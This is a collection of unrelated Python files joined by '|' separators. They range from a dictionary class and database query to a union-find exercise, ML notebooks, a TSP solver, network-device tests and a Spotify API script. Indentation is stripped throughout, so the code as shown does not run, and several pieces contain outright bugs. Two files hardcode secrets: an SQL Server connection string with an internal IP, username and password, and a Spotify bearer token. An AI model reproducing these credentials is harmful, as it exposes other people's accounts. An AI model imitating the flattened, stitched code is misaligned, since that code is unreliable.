self._tag_dicts = kwargs
if gfunc is True:
self.require_tag('gfunc')
elif gfunc is not None:
self.set_tag('gfunc', gfunc)
return
@property
def _gfunc(self):
return self.get_tag('gfunc')
def __getitem__(self, key):
gfunc = self._tag_dicts.get('gfunc', None)
if gfunc is not None and (key not in self._dict):
gval = gfunc.get(key, None)
if gval is not None:
item = gval()
self._dict[key] = item
item = self._dict[key]
if isinstance(item, MappingABC):
subtags = {}
for tagkey, tagdict in list(self._tag_dicts.items()):
if isinstance(tagdict, MappingABC):
try:
subtags[tagkey] = tagdict[key]
except KeyError:
continue
item = self.__class__(item, **subtags)
return item
def __getattr__(self, key):
try:
return self.__getitem__(key)
except KeyError:
raise AttributeError("'{0}' not in {1}".format(key, self))
def __setitem__(self, key, item):
self._dict[key] = item
def __setattr__(self, key, item):
if key in self.__slots__:
return super(TagBunch, self).__setattr__(key, item)
return self.__setitem__(key, item)
def __delitem__(self, key):
del self._dict[key]
def __delattr__(self, key):
return self.__delitem__(key)
def get(self, key, default = NOARG):
try:
return self[key]
except KeyError:
if default is not NOARG:
return default
raise
def setdefault(self, key, default):
try:
return self[key]
except KeyError:
self[key] = default
return default
def get_tag(self, tagkey, default = NOARG):
try:
return self._tag_dicts[tagkey]
except KeyError:
if default is not NOARG:
return default
raise
def has_tag(self, key):
return key in self._tag_dicts
def require_tag(self, tagkey):
if tagkey not in self._tag_dicts:
self._tag_dicts[tagkey] = DeepBunch({})
return
def set_tag(self, tagkey, obj):
self._tag_dicts[tagkey] = obj
return
def __contains__(self, key):
return (key in self._dict)
def has_key(self, key):
return key in self
def __dir__(self):
items = list(k for k in self._dict.keys() if isinstance(k, (str, unicode)))
items.sort()
#items += dir(super(Bunch, self))
return items
@repr_compat
def __repr__(self):
return (
'{0}({1}, {2})'
).format(
self.__class__.__name__,
self._dict,
self._tag_dicts,
)
#def __eq__(self, other):
# return
#
#def __ne__(self, other):
# return not (self == other)
def __iter__(self):
return iter(list(self.keys()))
def __len__(self):
return len(self._dict)
def iterkeys(self):
return iter(list(self._dict.keys()))
def keys(self):
return list(self._dict.keys())
def itervalues(self):
for key in list(self.keys()):
yield self[key]
return
def values(self):
return list(self.values())
def iteritems(self):
for key in list(self.keys()):
yield key, self[key]
return
def items(self):
return list(self.items())
MappingABC.register(TagBunch)
|
import pypyodbc
sql_server_conn_str = 'Driver={SQL Server Native Client 11.0};Server=172.16.3.65;Database=ArgaamPlus;Uid=argaamplususer;Pwd=argplus123$;'
# sql_server_conn_str = 'Driver={SQL Server Native Client 11.0};Server=172.16.3.51;Database=argaam_analytics;Uid=argplus_user;Pwd=argplus123$;'
conn = pypyodbc.connect(sql_server_conn_str)
cur = conn.cursor()
# cur.execute("{call dbo.SP_Q1_StockEntityWasUpOrDownByPercent(?,?,?,?,?,?)}", (77, 1, 'up', 5, 2001, 2005))
cur.execute("select * from companystockpricesarchive where companyid = ?", (77,))
# for d in cur.description:
# print(d)
print("")
for r in cur.fetchall():
print(r) |
#Implement a program to find the euclidean distance of two points.
x1=int(input("enter x1"))
y1=int(input("enter y1"))
x2=int(input("enter x2"))
y2=int(input("enter y2"))
eq=(x2-x1)**2
eq1=(y2-y1)**2
result=(eq+eq1)**0.5
print("the euclidean distance is",result)
|
# 팀 결성.
# 학교에서 0~N 까지의 번호를 부여했다.
# 팀 합치기 연산 -> 두 팀을 합치는 연산.
# 같은 팀 여부 확인 연산 두 학생이 같은 팀에 속하는지 확인하는 연산.abs
# 이 문제 아까 계속 했던 서로소 문제다.
# N은 번호 M은 연산의 개수
# 0 a b 는 팀 합치기 연산
# 0 a b는 같은 팀 여부 확인 연산
def find_parent(parent, x):#부모 노드를 찾는거 부모는 노드는 자식노드보다 무조건 큼.
if parent[x]!=x:
parent[x] = find_parent(parent, parent[x])
return parent[x]
def union_parent(parent,a,b):
a=find_parent(parent,a)
b=find_parent(parent,b)
if a<b:
parent[b]=a
else:
parent[a]=b
v,e=map(int,input().split())#노드(node) 개수랑 간선(edge) 개수
parent=[0]*(v+1)#부모 노드를 알기 위해서 하는 것.
for i in range(1,v+1):# 테이블 초기화
parent[i]=i
for i in range(e):
a,b,c=map(int,input().split())#값 받고 돌리기.
if a==0:
union_parent(parent,b,c)
elif a==1:
if parent[b]==parent[c]:
#이게 책상에는
# if find_parent(parent,a)==find_parent(parent,b): 로 되어있음.
# 그런데 개선된 서롯소 집합 알고리즘이라서 그냥 parent 리스트의 값만 확인해보면 될 것 같은데?
print('YES')
else:
print('NO') |
# standard lib
import sys
from pdb import set_trace
# 3rdparty lib
from PySide2.QtWidgets import QApplication, QDialog
# custom lib
from ui_AddFoodItem import Ui_Dialog
class MainWindow(QDialog):
def __init__(self):
super(MainWindow, self).__init__()
self.ui = Ui_Dialog()
self.ui.setupUi(self)
self.ui.pushButtonAdd.clicked.connect(self.add_item)
def add_item(self):
self.ui.listWidgetSelectedItems.addItem(self.ui.lineEditFood.text())
self.ui.lineEditFood.clear()
self.ui.lineEditFood.setFocus()
if __name__ == '__main__':
app = QApplication([])
window = MainWindow()
window.show()
sys.exit(app.exec_())
|
import re, logging
from pyfiles import jsonChecker, playerController, characterController
from pyfiles.db.attributes import ATTRIBUTE_NAMES
def split_words(text : str) -> list:
""" Breaks up a command input such as 'hello foo bar' into individual words"""
command_text = text.strip()
commands = command_text.split(' ')
return commands
def get_command_list() -> list:
return ['user [username]', 'say [message]', 'help']
def parse_chat_input(text: str) -> dict:
""" Checks chat input formats against command regex matchers """
user_match = re.match(r"user\s[\w]{1,12}", text) #('user [uname]')
chat_match = re.match(r"say\s([\w\s,.!()?]{1,140})", text) #('say [message]')
help_match = text == 'help' # plain help command
choice = 0
chat_data = None
#Check for user creation
if user_match is not None:
commands = split_words(text)
#2nd word should be the username i.e "user foo"
choice = 1
uname = commands[1]
logging.info("User login requested for user: " + uname)
chat_data = {'username':uname}
#Check for chat message
elif chat_match != None:
choice = 2
chat_data = chat_match.group(1) #all matching text
elif help_match:
choice = 3
return {'choice':choice, 'chat-data':chat_data}
def check_login_message(input_params : dict) -> (bool, dict or None):
data_tag = 'chat-data'
#Checking our parsed data exists
if input_params[data_tag] is None or \
'username' not in input_params[data_tag] or \
input_params[data_tag]['username'] is None:
logging.info('Missing (username) in protocol message (Probably not logged in?)')
return (False, None)
return (True, input_params)
def check_chat_message(input_params: dict) -> (bool, dict or None):
data_exists = 'chat-data' in input_params and input_params['chat-data'] is not None
username_exists = 'username' in input_params and \
input_params['username'] is not None
if data_exists and username_exists:
logging.info('User chat message checked (input good)')
return (True, input_params)
logging.info('Invalid protocol for chat message')
return (False, None)
def check_message_params(message : dict) -> (bool, dict):
""" Sanity checks the JSON protocol messages sent from the client
JSON message format is {'data': message/login, 'sessionJson': { username, sid, etc} }
"""
logging.info('CHECKING message: '+str(message))
data_tag = 'data'
chat_data_tag = 'chat-data'
param_tag = 'sessionJson'
if data_tag in message:
#Send the 'data' from the input to be checked
extracted_params = parse_chat_input(message[data_tag]) #returns {choice, chat-data or None}
logging.info('INPUT PARAMS:'+str(extracted_params))
if extracted_params is None:
logging.info('Missing (input param data) from protocol message')
else:
if 'choice' not in extracted_params or chat_data_tag not in extracted_params:
logging.info('Missing (choice AND/OR data) in protocol message')
else:
choice = extracted_params.pop('choice')
if choice == 1:
return (choice, check_login_message(extracted_params))
if choice == 2:
#Add the session data back onto the result
extracted_params.update(message[param_tag])
return (choice, check_chat_message(extracted_params))
if choice == 3:
return (choice, (True, None))
return (-1, (None, None))
def validate_character_update(characterJson : dict) -> bool:
""" Checks we've been given valid data, and that any changes are within limits """
return jsonChecker.character_details_exist(characterJson, ATTRIBUTE_NAMES)
#Check for a prexisting character
#if characterController.find_character(characterJson['data']['charname']) is None:
|
# encoding: utf-8
import sys
import random
from lib import keystreams
def error(message):
print message
print "Usage: python echocrypt.py [e|d] \"message\" [keystream name]"
exit(1)
mode = sys.argv[1]
if mode == 'e':
# If the keystream to use is specified, use that one; otherwise, use a random one in the dictionary
try:
keystream_name = sys.argv[3]
except IndexError:
keystream_name = random.choice(keystreams.total.keys())
print "Using keystream: %s" % keystream_name
keystream = keystreams.total[keystream_name]
try:
message = sys.argv[2]
except IndexError:
error("You must specify a message to encrypt.")
ciphertext = keystream.encrypt(message)
print ciphertext
elif mode == 'd':
try:
message = sys.argv[2]
except IndexError:
error("You must specify a message to decrypt.")
# Keystream name must be specified in this case
try:
keystream_name = sys.argv[3]
except IndexError:
error("You must specify a keystream to decrypt with.")
keystream = keystreams.total[keystream_name]
plaintext = keystream.decrypt(message)
print plaintext
"""
if mode == 'e' or mode == 'a':
message = sys.argv[2]
bin_message = utils.bin_from_string(message) if mode == 'e' else message
num_chars = len(bin_message)
total_keystream = pickle.load(open("keystreams"))
keystream = total_keystream[:num_chars]
print bin_message
print "---------"
print keystream
# Save it to a file
pickle.dump(keystream, open("keystream_used", "wb"))
print "---------"
ciphertext = bin(int(bin_message, 2) + int(keystream, 2))[2:]
print ciphertext
elif mode == 's' or mode == 'd':
ciphertext = sys.argv[2]
keystream = pickle.load(open("keystream_used"))
message = bin(int(ciphertext, 2) - int(keystream, 2))[2:]
if mode == 's':
num_bits = len(message) / 7
chars = []
for i in xrange(num_bits):
char = chr(int(message[i*7:(i+1)*7], 2))
chars.append(char)
print ''.join(chars)
else:
print message
"""
|
from gym.wrappers.rescale_action import RescaleAction
from rltk.common.utils import import_class_from_string
from gym.spaces.box import Box
import gym
def make_env(name: str, loader: str = "gym", **kwargs):
rescale_action = kwargs.get('rescale_action', True)
env = None
if loader == "gym": # Base Wrapper
try:
from gym_extensions.continuous import mujoco
except:
print('gym_extensions import failure !')
pass
env = gym.make(name)
elif loader == "metaworld":
env = import_class_from_string(name)(**kwargs)
elif loader == "dm_control":
import dmc2gym
# Useful Options: frame_skip, from_pixels
# Note: dmc2gym normalized the action but still we can
# use RescaleAction.
# NOTE: in the future maybe simply return the env.
env = dmc2gym.make(domain_name=name, **kwargs)
elif loader == 'atari':
raise NotImplementedError()
assert env is not None
if isinstance(env.action_space, Box) and rescale_action:
# Environment has continuous space and by default is normalized.
env = RescaleAction(env, -1, 1)
return env
|
# Databricks notebook source
# MAGIC %md
# MAGIC # Linear Regression Consulting Project
# COMMAND ----------
# MAGIC %md
# MAGIC Congratulations! You've been contracted by Hyundai Heavy Industries to help them build a predictive model for some ships. [Hyundai Heavy Industries](http://www.hyundai.eu/en) is one of the world's largest ship manufacturing companies and builds cruise liners.
# MAGIC
# MAGIC You've been flown to their headquarters in Ulsan, South Korea to help them give accurate estimates of how many crew members a ship will require.
# MAGIC
# MAGIC They are currently building new ships for some customers and want you to create a model and use it to predict how many crew members the ships will need.
# MAGIC
# MAGIC Here is what the data looks like so far:
# MAGIC
# MAGIC Description: Measurements of ship size, capacity, crew, and age for 158 cruise
# MAGIC ships.
# MAGIC
# MAGIC
# MAGIC Variables/Columns
# MAGIC Ship Name 1-20
# MAGIC Cruise Line 21-40
# MAGIC Age (as of 2013) 46-48
# MAGIC Tonnage (1000s of tons) 50-56
# MAGIC passengers (100s) 58-64
# MAGIC Length (100s of feet) 66-72
# MAGIC Cabins (100s) 74-80
# MAGIC Passenger Density 82-88
# MAGIC Crew (100s) 90-96
# MAGIC
# MAGIC It is saved in a csv file for you called "cruise_ship_info.csv". Your job is to create a regression model that will help predict how many crew members will be needed for future ships. The client also mentioned that they have found that particular cruise lines will differ in acceptable crew counts, so it is most likely an important feature to include in your analysis!
# MAGIC
# MAGIC Once you've created the model and tested it for a quick check on how well you can expect it to perform, make sure you take a look at why it performs so well!
# COMMAND ----------
dataset = spark.read.format("csv").load("/FileStore/tables/mllib_sample_data/cruise_ship_info.csv", header = True, inferSchema = True)
# COMMAND ----------
from pyspark.ml.linalg import Vectors
from pyspark.ml.feature import VectorAssembler
from pyspark.ml.feature import StringIndexer
from pyspark.ml.feature import OneHotEncoder
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Dealing with Cruise Line column: turn string to index and apply onehot encoding
# COMMAND ----------
# StringIndex + Onehot for the Cruiseline Column:
indexer = StringIndexer(inputCol = 'Cruise_line',
outputCol = 'Cruiseline_Index')
indexed = indexer.fit(dataset).transform(dataset)
encoder = OneHotEncoder(inputCols = ['Cruiseline_Index'], outputCols = ['Cruiseline_Onehot'])
encoded = encoder.fit(indexed).transform(indexed)
encoded.show()
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Construct the Feature column for the model by using VectorAssembler
# COMMAND ----------
assembler = VectorAssembler(
inputCols = ['Age', 'Tonnage','passengers','length','cabins','passenger_density', 'Cruiseline_Onehot'],
outputCol = 'features')
output = assembler.transform(encoded)
# COMMAND ----------
final_data = output.select('features', 'crew')
# COMMAND ----------
train_data, test_data = final_data.randomSplit([0.7, 0.3])
# COMMAND ----------
from pyspark.ml.regression import LinearRegression
# COMMAND ----------
lr = LinearRegression(labelCol = 'crew')
lrModel = lr.fit(train_data)
# COMMAND ----------
test_results = lrModel.evaluate(test_data)
# COMMAND ----------
print('RMSE:{}'.format(test_results.rootMeanSquaredError))
print('R2:{}'.format(test_results.r2adj))
# COMMAND ----------
|
# this program calculates the total number of times each word has been tweeted.
import sys
#get file path from command line argument in python
infile=open(sys.argv[1],"r+")
outfile=open(sys.argv[2],"w")
#dictionary containing key (tweeted word) and value (total number of times each tweeted word)
word_count = {}
for line in infile:
data = line.strip().split(" ")
for key in data:
if key in word_count.keys():
word_count[key] +=1
else:
word_count[key] = 1
#find the longest string (key) in the dictionary word_count
width = len(max(sorted(word_count),key=len)) + 4
for key in sorted(word_count):
outfile.write(key.ljust(width))
outfile.write(repr(word_count[key]))
outfile.write("\n")
outfile.close()
|
from django.db import models
class ContactMessage(models.Model):
title = models.CharField(max_length=100)
email = models.CharField(max_length=100)
detail = models.TextField(blank=True,null=True)
reply = models.BooleanField(detail=False)
def __str__(self):
return self.title |
import random
import itertools
import csv
import os.path
from timeit import default_timer as timer
from Point import Point
from Tour import Tour
#<editor-fold desc = "Nearest Neighbor">
def doNearestNeighbor(points):
start = timer()
tour = nearestNeighbor(points)
end = timer()
print 'Nearest Neighbor'
print 'Path Taken:', tour.toString()
print 'Distance Traveled: ', tour.pathLength
print 'Time Taken: ', end - start
def nearestNeighbor(points):
p0 = p = points[0]
points[0].visited = True
i = 0
tour = Tour(list(), 0)
tour.path.append(p0)
while i < len(points)-1:
i += 1
nextPoint = p.findNearestPoint(points)
tour.pathLength += p.distance(nextPoint)
p = nextPoint
tour.path.append(p)
tour.pathLength += p.distance(p0)
return tour
#</editor-fold>
#<editor-fold desc = "Exhaustive Search">
def doExhaustiveSearch(points):
start = timer()
tour = exhaustiveSearch(points)
end = timer()
print 'Exhaustive Search'
print 'Path Taken:', tour.toString()
print 'Distance Traveled: ', tour.pathLength
print 'Time Taken: ', end - start
def exhaustiveSearch(points):
p0 = points[0]
points.remove(p0)
permutations = itertools.permutations(points)
bestTour = Tour()
for perm in permutations:
dist = calculatePermutationCost(p0, perm)
if(dist < bestTour.pathLength):
bestTour.path = perm
bestTour.pathLength = dist
bestTour.path = list(bestTour.path)
bestTour.path.insert(0, p0)
return bestTour
def calculatePermutationCost(p0, perm):
totalDist = p0.distance(perm[0])
i = 0
while i != len(perm)-1:
totalDist += perm[i].distance(perm[i+1])
i+=1
totalDist += perm[-1].distance(p0)
return totalDist
#</editor-fold>
#<editor-fold desc="Make/Get points">
def generatePoints(n):
points = list()
random.seed()
while len(points) < n:
point = Point(random.randint(0, 100), random.randint(0, 100))
if not any(point.equals(item) for item in points):
points.append(point)
return points
def readFile(fileName):
points = list()
with open(fileName, 'r') as file:
reader = csv.reader(file, delimiter=' ')
for row in reader:
if(len(row) > 1):
x = int(row[0])
y = int(row[1])
points.append(Point(x, y))
return points
def writeFile(points):
with open("points.txt", 'w') as file:
file.write(str(len(points)) + '\n')
for point in points:
file.write(str(point.x) + ' ' + str(point.y) + '\n')
#</editor-fold>
def main():
userInput = raw_input('Enter a filename or the number of points to generate: ')
if userInput.isdigit():
points = generatePoints(int(userInput))
writeFile(points)
elif(os.path.isfile(userInput)):
points = readFile(userInput)
else:
print 'Invalid input: File does not exist or input is not a number'
exit()
print ''
doNearestNeighbor(points)
print ''
doExhaustiveSearch(points)
main()
|
# Python
import unittest
from copy import deepcopy
from unittest.mock import Mock
# ATS
from pyats.topology import Device
# Genie
from genie.libs.ops.interface.iosxr.interface import Interface
from genie.libs.ops.interface.iosxr.tests.interface_output import InterfaceOutput
# nxos show_interface
from genie.libs.parser.iosxr.show_interface import ShowInterfacesDetail, \
ShowEthernetTags, \
ShowIpv4VrfAllInterface, \
ShowIpv6VrfAllInterface, \
ShowInterfacesAccounting
from genie.libs.parser.iosxr.show_vrf import ShowVrfAllDetail
outputs = {}
outputs[
'show interface GigabitEthernet0/0/0/1 detail'] = \
InterfaceOutput.ShowInterfacesDetail_gi1
outputs[
'show interfaces GigabitEthernet0/0/0/1 accounting'] = \
InterfaceOutput.ShowInterfacesAccounting_gi1
outputs['show ethernet tags GigabitEthernet0/0/0/1'] = InterfaceOutput.ShowEthernetTag_gi1
outputs['show ethernet tags'] = InterfaceOutput.ShowEthernetTags_all
outputs['show vrf VRF1 detail'] = InterfaceOutput.ShowVrfAllDetail_vrf1
outputs['show ipv4 vrf VRF1 interface'] = InterfaceOutput.ShowIpv4VrfAllInterface_vrf1
outputs['show ipv6 vrf VRF1 interface'] = InterfaceOutput.ShowIpv6VrfAllInterface_vrf1
outputs['show ipv4 vrf all interface'] = InterfaceOutput.ShowIpv4VrfAllInterface_all
outputs['show ipv6 vrf all interface'] = InterfaceOutput.ShowIpv6VrfAllInterface_all
outputs['show ipv6 vrf VRF1 interface GigabitEthernet0/0/0/1'] = InterfaceOutput.ShowIpv6VrfAllInterface_gi1
outputs['show vrf all detail'] = InterfaceOutput.ShowVrfAllDetail_all
outputs['show interfaces accounting'] = InterfaceOutput.ShowInterfacesAccounting_all
def mapper(key):
return outputs[key]
class test_interface(unittest.TestCase):
def setUp(self):
self.device = Device(name='aDevice')
self.device.os = 'iosxr'
self.device.mapping = {}
self.device.mapping['cli'] = 'cli'
# Give the device as a connection type
# This is done in order to call the parser on the output provided
self.device.connectionmgr.connections['cli'] = self.device
def test_complete_output(self):
self.maxDiff = None
intf = Interface(device=self.device)
# Get outputs
intf.maker.outputs[ShowInterfacesDetail] = \
{"{'interface':''}": InterfaceOutput.ShowInterfacesDetail}
intf.maker.outputs[ShowEthernetTags] = \
{"{'interface':''}": InterfaceOutput.ShowEthernetTags}
intf.maker.outputs[ShowVrfAllDetail] = \
{"{'vrf':''}": InterfaceOutput.ShowVrfAllDetail}
intf.maker.outputs[ShowInterfacesAccounting] = \
{"{'interface':''}": InterfaceOutput.ShowInterfacesAccounting}
self.device.execute = Mock()
self.device.execute.side_effect = mapper
# Learn the feature
intf.learn()
# Verify Ops was created successfully
self.assertDictEqual(intf.info, InterfaceOutput.InterfaceOpsOutput_info)
def test_empty_output(self):
self.maxDiff = None
intf = Interface(device=self.device)
# Get outputs
intf.maker.outputs[ShowInterfacesDetail] = {"{'interface':''}": ''}
intf.maker.outputs[ShowIpv4VrfAllInterface] = {"{'vrf':None,'interface':''}": ''}
intf.maker.outputs[ShowIpv6VrfAllInterface] = {"{'vrf':None,'interface':''}": ''}
intf.maker.outputs[ShowVrfAllDetail] = {"{'vrf':''}": ''}
intf.maker.outputs[ShowEthernetTags] = {"{'interface':''}": ''}
intf.maker.outputs[ShowInterfacesAccounting] = {"{'interface':''}": ''}
outputs['show ipv4 vrf all interface'] = ''
outputs['show ipv6 vrf all interface'] = ''
self.device.execute = Mock()
self.device.execute.side_effect = mapper
# Learn the feature
intf.learn()
# Check no attribute not found
# info - vrf
with self.assertRaises(AttributeError):
vrf = (intf.info['MgmtEth0/0/CPU0/0']['type'])
outputs['show ipv4 vrf all interface'] = InterfaceOutput.ShowIpv4VrfAllInterface_all
outputs['show ipv6 vrf all interface'] = InterfaceOutput.ShowIpv6VrfAllInterface_all
def test_custom_output(self):
intf = Interface(device=self.device)
# Get outputs
intf.maker.outputs[ShowIpv4VrfAllInterface] = \
{"{'vrf':''}": InterfaceOutput.ShowIpv4VrfAllInterface}
intf.maker.outputs[ShowIpv6VrfAllInterface] = \
{"{'vrf':''}": InterfaceOutput.ShowIpv6VrfAllInterface}
intf.maker.outputs[ShowVrfAllDetail] = \
{"{'vrf':''}": InterfaceOutput.ShowVrfAllDetail}
self.device.execute = Mock()
self.device.execute.side_effect = mapper
# Learn the feature
intf.learn(interface='GigabitEthernet0/0/0/1', address_family='ipv6', vrf='VRF1')
self.maxDiff = None
# Verify Ops was created successfully
self.assertDictEqual(intf.info, InterfaceOutput.interfaceOpsOutput_custom_info)
def test_selective_attribute(self):
self.maxDiff = None
intf = Interface(device=self.device)
# Get outputs
intf.maker.outputs[ShowInterfacesDetail] = \
{"{'interface':''}": InterfaceOutput.ShowInterfacesDetail}
intf.maker.outputs[ShowEthernetTags] = \
{"{'interface':''}": InterfaceOutput.ShowEthernetTags}
intf.maker.outputs[ShowIpv4VrfAllInterface] = \
{"{'vrf':''}": InterfaceOutput.ShowIpv4VrfAllInterface}
intf.maker.outputs[ShowIpv6VrfAllInterface] = \
{"{'vrf':''}": InterfaceOutput.ShowIpv6VrfAllInterface}
intf.maker.outputs[ShowVrfAllDetail] = \
{"{'vrf':''}": InterfaceOutput.ShowVrfAllDetail}
intf.maker.outputs[ShowInterfacesAccounting] = \
{"{'interface':''}": InterfaceOutput.ShowInterfacesAccounting}
self.device.execute = Mock()
self.device.execute.side_effect = mapper
# Learn the feature
intf.learn()
# Check specific attribute values
# info - type
self.assertEqual(intf.info['MgmtEth0/0/CPU0/0']['type'], 'Management Ethernet')
def test_incomplete_output(self):
self.maxDiff = None
intf = Interface(device=self.device)
# Get outputs
intf.maker.outputs[ShowInterfacesDetail] = \
{"{'interface':''}": InterfaceOutput.ShowInterfacesDetail}
intf.maker.outputs[ShowEthernetTags] = \
{"{'interface':''}": InterfaceOutput.ShowEthernetTags}
intf.maker.outputs[ShowVrfAllDetail] = \
{"{'vrf':''}": InterfaceOutput.ShowVrfAllDetail}
intf.maker.outputs[ShowInterfacesAccounting] = \
{"{'interface':''}": InterfaceOutput.ShowInterfacesAccounting}
outputs['show ipv4 vrf all interface'] = ''
self.device.execute = Mock()
self.device.execute.side_effect = mapper
# Learn the feature
intf.learn()
# Delete missing specific attribute values
expect_dict = deepcopy(InterfaceOutput.InterfaceOpsOutput_info)
del (expect_dict['GigabitEthernet0/0/0/0']['ipv4'])
del (expect_dict['GigabitEthernet0/0/0/1']['ipv4'])
# Verify Ops was created successfully
self.assertEqual(intf.info, expect_dict)
outputs['show ipv4 vrf all interface'] = InterfaceOutput.ShowIpv4VrfAllInterface_all
if __name__ == '__main__':
unittest.main()
|
import csv
import numpy
import logging
import json
def is_number(input):
"""
Check if the input is a floating point number and if the input is a real
number
:param input: value
:return: Boolean of whether or not the value passes
"""
try:
float(input)
if numpy.isreal(float(input)):
return True
else:
raise ValueError
except ValueError:
logging.warning('Dataset contains non-real or non-numerical values.')
return False
def read_data(filename):
"""read the data from the csv input file. Checks to see if file exists and
checks for bad data. Should automatically ensure that time and voltage
arrays end up as equal size arrays
:param filename: input file name
:return: time = time array, voltage = voltage array
"""
file = open(filename, 'r')
# except IOError:
# print("File Not Found")
# return
# logging.error('File Not Found')
time = []
voltage = []
temp = csv.reader(file, delimiter=',')
for row in temp:
if (is_number(row[0])) and (is_number(row[1])):
temptime = float(row[0])
tempvolt = float(row[1])
time.append(temptime)
voltage.append(tempvolt)
return time, voltage
def write_json(filename, info):
"""Write data to .json file
:param filename: Output filename
:param info: Dictionary containing data to write
:return:
"""
json_filename = filename.replace('.csv', '.json')
json_file = open(json_filename, "w")
json.dump(info, json_file)
json_file.close
return
# def main():
# try:
# xtime, xvoltage = read_data('./test1.csv')
# except IOError:
# print('main: File not Found')
# return
# print(xtime)
# print(xvoltage)
#
# print(is_number('FIVE'))
# if __name__ == "__main__":
# main()
|
import requests
import billboard_miner
api_token = "Bearer BQB7Ojx2hlfuMpAJkVExFA5hdcfv1MR1k_jp7qUE_Np142Y40k-j-Ed8Cs7eeNKIp0bU0t7BzoxrqSYsoYNGqtVXE06bgW2VjHyEy5VGvKk6pN1n5kN8wzgRb7zoSLJuo3gOHn-rALAMayM-vPg"
def getSongIds(song_list):
base_url = "https://api.spotify.com/v1/search"
headers = {"Authorization": api_token}
id_list = []
for x in song_list:
song_name = x["song_name"].replace(" ", "+")
query_string = "%s %s" % (x["artist"], song_name)
query = {"q": query_string, "type": "track", "limit": 1}
r = requests.get(base_url, params=query, headers=headers)
if r.status_code != requests.codes.ok:
print("Failed to Download Track: %s" % x["song_name"])
print("Failed with Error Code: %d" % r.status_code)
else:
json = r.json()["tracks"]["items"][0]
artist_list = []
for x in json["artists"]:
artist_list.append(x["name"])
id_list.append(json["id"])
return id_list
def getSongPopularity(ids):
# ids = ['11dFghVXANMlKmJXsNCbNl', '11dFghVXANMlKmJXsNCbNl']
base_url = "https://api.spotify.com/v1/tracks/"
headers = {"Authorization": api_token}
song_list = []
for i in ids:
url = base_url + i
r = requests.get(url, headers=headers)
if r.status_code != requests.codes.ok:
print("Failed to Download Track: ID %s" % i)
print("Failed with Error Code: %d" % r.status_code)
else:
json = r.json()
song_dict = {}
song_dict["title"] = json["name"]
song_dict["popularity"] = json["popularity"]
artist_list = []
for x in json["artists"]:
artist_list.append(x["name"])
song_dict["artists"] = artist_list
song_list.append(song_dict)
return song_list
songs = billboard_miner.miner("https://www.billboard.com/charts/year-end/2015/hot-rap-songs")
print(songs)
temp = [{"artist": "drake", "song_name": "hotline bling"}]
id_list = getSongIds(temp)
print(getSongPopularity(id_list))
|
import numpy as np
from bokeh.io import curdoc
from bokeh.layouts import Row, WidgetBox
from bokeh.models import ColumnDataSource
from bokeh.models.widgets import Slider, RadioButtonGroup, Toggle
from bokeh.plotting import Figure
"""
This plot visualizes how waves propagate by simulating the right-going and
left-going wave. The user can choose the initial condition, which will determine
the shape of both waves.
An advanced option is used to enable the intial condition on the first
derivative with respect to time.
"""
# Define sizing constants for the plot to neatly fit in the website
HEIGHT = 400
WIDTH_PLOT = 600
WIDTH_TOAL = 800
# Left-most and righ-most point for value pairs to still be calculated
LEFT_X = -10
RIGHT_X = 10
LINE_WIDTH = 2
# The zeroth initial condition (elongation at time zero)
INIT_0_1_indicator = "Glocke"
def INIT_0_1(x):
return np.exp(-x**2)
INIT_0_2_indicator = "Hütchen"
def INIT_0_2(x):
return np.piecewise(x,
[x<-1, (-1 <= x) & (x < 0), (0 <= x) & (x < 1), 1<=x],
[0, lambda ele: ele+1, lambda ele: -ele+1, 0])
indicators_0 = [INIT_0_1_indicator, INIT_0_2_indicator, ]
initials_0 = [INIT_0_1, INIT_0_2, ]
# The first initial condition (velocity/momentum at time zero)
INIT_1_1_indicator = "1/(1+e^(-x)) - 0,5"
def INIT_1_1_integrated(x):
return 0.5*x + np.log(1 + np.exp(-x))
INIT_1_2_indicator = "1"
def INIT_1_2_integrated(x):
return x
INIT_1_3_indicator = "x, x in (-1, 1)"
def INIT_1_3_integrated(x):
return np.piecewise(x,
[x < -1, (-1 <= x ) & (x < 1), 1 <=x],
[0, lambda ele: 0.5 * ele**2, 0])
indicators_1 = [INIT_1_1_indicator, INIT_1_2_indicator, INIT_1_3_indicator]
initials_1_integrated = [INIT_1_1_integrated, INIT_1_2_integrated,
INIT_1_3_integrated]
def update_data(init_0_active, speed, scale_0, time, init_1_active, scale_1):
"""
This function calculates the value pairs for the plotted line to be drawn
upon. It therefore uses the general solution to the wave propagation
equation in one dimension:
u(t,x) = 1/2 * (
u_0(x + c*t) * u_0(x - c*t) + 1/c * (
integral from (x - c*t) to (x + c*t) over u_1(l) dl
)
The integration of the first (u_1) initial condition is preworked in the
function pointer list 'initials_1_integrated'. Therefore, we only have to
evaluate the antiderivate at the upper and lower boundary of the integral.
We also encorporate a scale to visualize the influence of the initial
condition:
u_0 = scale_0 * u_0_original
u_1 = scale_1 * u_1_original
"""
x = np.linspace(LEFT_X, RIGHT_X, 200)
u_left_going = scale_0 * initials_0[init_0_active](x + speed * time)
u_right_going = scale_0 * initials_0[init_0_active](x - speed * time)
U_momentum_left_going = scale_1 *\
initials_1_integrated[init_1_active](x + speed * time)
U_momentum_right_going = scale_1 *\
initials_1_integrated[init_1_active](x - speed * time)
u = 0.5 * (
u_left_going + u_right_going +
1/speed * (
U_momentum_left_going - U_momentum_right_going
))
return x, u
# The ColumnDataSource abstracts the transmission of data to the client over the
# Websocket Protocol. Whenever its data member variable is updated the new
# information is send to be displayed.
data_source = ColumnDataSource(data={'x': [], 'y': []})
plot = Figure(plot_height=HEIGHT, plot_width=WIDTH_PLOT, x_range=[-5, 5],
y_range=[-0.5, 2.5])
plot.line("x", "y", source=data_source, color="blue", line_width=LINE_WIDTH)
# Select the zeroth initial condition
init_0_selector = RadioButtonGroup(labels=indicators_0, active=0)
# Select the speed at which the wave propagates
speed = Slider(title="Ausbreitungsgeschwindigkeit", start=0.1, end=2, step=0.1,
value=1)
# Manipulate the influence of the zeroth initial condition
scale_0 = Slider(title="Skalierung der 1. Anfangsbedingung", start=0.1, end=2,
step=0.1, value=1)
# Toggle that adds a periodic callback function, so that the plot seems to be
# moving
animation_toggle = Toggle(label="Animieren")
# Lets the user adjust the time in the transient simulation on its own
time = Slider(title="Zeit", value=0, start=0, end=10, step=0.1)
# Allow the initial speed to be considered (This is deactivated up front since
# the bevahiour might seem slightly unphysical)
advanced_toggle = Toggle(label="Zweite Anfangsbedingung aktivieren")
# Select the type of the first initial condition
init_1_selector = RadioButtonGroup(labels=indicators_1, active=0, visible=False)
# Manipulate the influence of the first initial condition
